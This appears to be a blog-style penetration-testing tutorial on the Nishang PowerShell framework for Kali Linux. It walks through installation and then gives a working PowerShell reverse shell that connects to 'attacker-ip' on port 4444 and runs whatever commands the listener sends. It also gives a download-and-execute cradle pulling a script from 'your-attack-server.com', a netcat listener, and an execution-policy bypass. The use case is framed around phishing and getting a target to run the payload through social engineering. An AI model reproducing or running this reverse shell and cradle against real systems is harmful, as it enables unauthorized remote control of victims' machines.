# Nishang$ Pentesting Tools and Techniques
## Section 1: Introduction to Nishang$
Nishang is a powerful framework for penetration testing and red teaming that primarily focuses on the use of PowerShell. As a part of the Kali Linux suite, Nishang allows ethical hackers to effectively execute attacks against Windows environments, leveraging the capabilities of PowerShell to bypass security mechanisms. This section aims to guide you through the installation and configuration of Nishang on Kali Linux, its usage, real-world applications, and detailed technical insights.
### Installation and Configuration on Kali Linux
#### Step 1: Updating Kali Linux
Before installing Nishang, ensure your Kali Linux is up to date:
"`bash
sudo apt update && sudo apt upgrade -y
"`
#### Step 2: Cloning the Nishang Repository
Nishang can be obtained from its official GitHub repository. Use the following command to clone it:
"`bash
git clone https://github.com/samratashok/nishang.git
"`
#### Step 3: Navigating to the Nishang Directory
Once cloned, navigate to the Nishang directory:
"`bash
cd nishang/
"`
#### Step 4: Setting Up Execution Policy
PowerShell scripts require proper execution policies to run. You can set the execution policy to allow local scripts:
"`powershell
Set-ExecutionPolicy Bypass -Scope Process
"`
#### Step 5: Verifying Installation
To confirm that Nishang is properly installed, you can list the available scripts in the `Nishang` folder:
"`bash
ls .Shells
"`
This command will display a list of various shell scripts that you can utilize.
### Step-by-Step Usage and Real-World Use Cases
Now that Nishang is installed, let's explore its usage through a practical example: creating a reverse shell. This is a common penetration testing task, where an attacker gains access to a target machine by opening a shell that connects back to an attacker's machine.
#### Example: Creating a Reverse Shell
**Use Case**: You have gained access to a target machine via phishing and want to establish a foothold.
##### Step 1: Prepare Your Listener
On your attacker machine, set up a listener using Netcat to catch the reverse shell:
"`bash
nc -lvnp 4444
"`
##### Step 2: Crafting the Reverse Shell Script
Using Nishang, you can create a reverse shell in the PowerShell environment. Below is a simple script leveraging Nishang:
"`powershell
IEX (New-Object Net.WebClient).DownloadString('http://your-attack-server.com/reverse.ps1')
"`
– Replace `http://your-attack-server.com/reverse.ps1` with the URL where your reverse shell script is hosted.
##### Step 3: Hosting the Reverse Shell
You need to create a PowerShell script (`reverse.ps1`) that initiates the connection back to your listener:
"`powershell
$client = New-Object System.Net.Sockets.TCPClient("attacker-ip", 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -ComObject System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$bytes = (New-Object -ComObject System.Text.ASCIIEncoding).GetBytes($sendback2);
$stream.Write($bytes,0,$bytes.Length);
$stream.Flush();
}
$client.Close();
"`
– Save this script on your web server and serve it such that it can be accessed via the crafted reverse shell command.
##### Step 4: Execute the Payload on the Target
Once the target executes the command (often through social engineering), a connection will be established back to your listener, providing you with a shell.
### Detailed Technical Explanations
Nishang encompasses a wide array of techniques that utilize PowerShell, which is a powerful shell on Windows. Understanding the technical workings of these methods is essential for effective penetration testing.
#### PowerShell and Its Importance
PowerShell is built on the .NET framework, allowing for powerful scripting capabilities and direct access to Windows APIs. This makes it particularly effective for bypassing traditional security measures, such as antivirus and firewalls. Nishang scripts can leverage these capabilities to perform various attacks, such as:
– **Credential Harvesting**: Extracting user credentials from memory or local storage.
– **Command Execution**: Running arbitrary commands on the target.
– **Persistence**: Establishing methods to maintain access to the target.
#### Potential Risks and Ethical Considerations
While using Nishang, it is crucial to adhere to ethical hacking standards. Always ensure that you have explicit permission to test any system. Unauthorized use of these techniques could result in severe legal consequences.
### External Reference Links
– [Nishang GitHub Repository](https://github.com/samratashok/nishang)
– [PowerShell Official Documentation](https://docs.microsoft.com/en-us/powershell/)
– [Kali Linux Official Documentation](https://www.kali.org/docs/)
### Conclusion
Nishang is a powerful toolset for ethical hackers looking to expand their capabilities in penetration testing environments, particularly those involving Windows machines. With the ability to execute complex commands and scripts through PowerShell, it allows for effective exploitation techniques, making it a must-have in the cybersecurity toolkit.
By following the installation instructions and examples outlined in this section, you will be well-prepared to utilize Nishang in real-world scenarios, enhancing your penetration testing proficiency.
—
*Made by pablo rotem / פבלו רותם*